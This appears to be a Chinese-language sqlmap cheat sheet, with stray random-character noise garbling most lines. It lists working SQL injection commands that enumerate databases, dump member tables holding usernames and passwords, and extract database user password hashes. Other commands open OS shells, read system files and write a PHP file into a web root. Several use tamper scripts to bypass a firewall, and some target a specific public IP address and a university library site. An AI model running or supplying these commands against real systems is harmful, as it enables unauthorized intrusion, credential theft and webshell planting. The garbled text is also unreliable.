sqlmap使用实例

admin

/pentest/database/sqlmap

update :::::>     in the folder   after  execute    following   order : svn update

0 ^6 A* H8 W3 x; u7 [sqlmap.py -r 1.txt --current-db
5 Q4 ~3 \9 ?6 A. {: v
v 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”
4 m3 A) M* ^$ B, o* m
. [6 b! w; ~& b8 E2 i. k- ]* P==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1))
7 j# S- q: z' Q3 G猜解数据库
./sqlmap.py -u "injection-url" --dbs
0 w$ s! N7 F( ]4 W5 {sqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"

8 h8 R: @' W, L2 v+ ^; @猜解表名
8 x* c% z7 z! G4 k./sqlmap.py -u "injection-url" -D database_name --tables

8 V4 F( G; g) ~, }sqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py"

) A- @- ~& k- }# `- u, q% s: Ksqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump
0 u6 a, ~& O0 W! I' @! s) |
) D, W1 k& V* ?) B0 k8 F7 d, Zsqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"
3 r9 a/ N  \0 b1 ?: Q. Fsqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"
" I( Y' k5 }" T, I8 \7 {5 j; g7 _sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py"
sqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"
9 c: ^7 u0 j& K& @4 y; g8 s+ g
sqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"
sqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"
sqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"
2 h+ u7 j7 H. w5 c, a7 Dsqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"
* O: \" Q5 Q2 {) \  O2 _' E$ Csqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump
2 E" k' L7 I+ h9 W) |# f) v
$ m0 x% d/ {, B% t+ U6 g* Wsqlmap.py -r 1.txt -v 3 --dbs  --batch --tamper "space2morehash.py" 绕过防火墙了
# P, Q8 q8 Q5 ~' O- [& i9 O; \sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"

/ i. l+ F7 n5 J. p1 Z- vsqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"
猜解列名
./sqlmap.py -u "injection-url" -D database_name -T table_name --columns

1 x( C! K7 r+ t# R  v8 R% N# I4 {sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py"
7 d" z9 o& V4 I5 q5 M( r2 }sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py"
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"

- J$ x9 ~  l/ S; ssqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"
&submit=Go
猜解值
./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump
1 L  T9 b8 z/ Z9 |8 n* _========================================================
- [" b1 a/ v4 j! e( @+ h$ ^) O& h5 X搜索表名中包括mana字符的
/sqlmap.py -u "injection-url" -T mana --search
返回一个交互式sql shell
/sqlmap.py -u "injection-url" --sql-shell
7 Z5 T& j5 w% u5 x读取指定文件（需权限）
/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"
5 r1 w, ~& g: S) E+ V查看当前 用户 及 数据库
/sqlmap.py -u "injection-url" --current-user --current-db
本地文件 写入 远程目标绝对路径
/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py"
+ P  [6 A) {" K( _7 V& H
% E- C9 d) d, a# ]: G; ssqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
. q* l* P+ Y3 y' T, t. ~2 S( C查看某用的权限
8 [# S+ u6 t; J! i/sqlmap.py -u "injection-url" --privileges -U root
查看当前用户是否为dba
/sqlmap.py -u "injection-url" --is-dba
7 B1 F. s% q: j/ l读取所有数据库用户或指定数据库用户的密码
sqlmap.py -r 1.txt --users --passwords
sqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py"
  N/ I" o7 {+ A; J8 `: Q
3 `: x- M3 ~0 t. i2 n/sqlmap.py -u "injection-url" --passwords -U root

. g# }& R' d) L% x$ H7 i% q--start&&--stop 与 --first&&--last 的区别
3 y# s8 Q- y. b/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump   （--start=1 --stop=2 会列出第二条记录。。。。记录例如：0 1 2 3 ……）
; H0 V; @! {& e: }
从字典中查找(属于暴利破解)存在的表（sqlmap/txt/common-tables.txt）或字段（sqlmap/txt/common-columns.txt）
9 e' X+ X! V# C& H( X/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns

执行sql语句，如查询@@datadir得到数据库路径（或者user()/database()等等……）
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"
$ @* C* Z" l' S- M8 l
  U+ _4 x5 ]  H+ z! O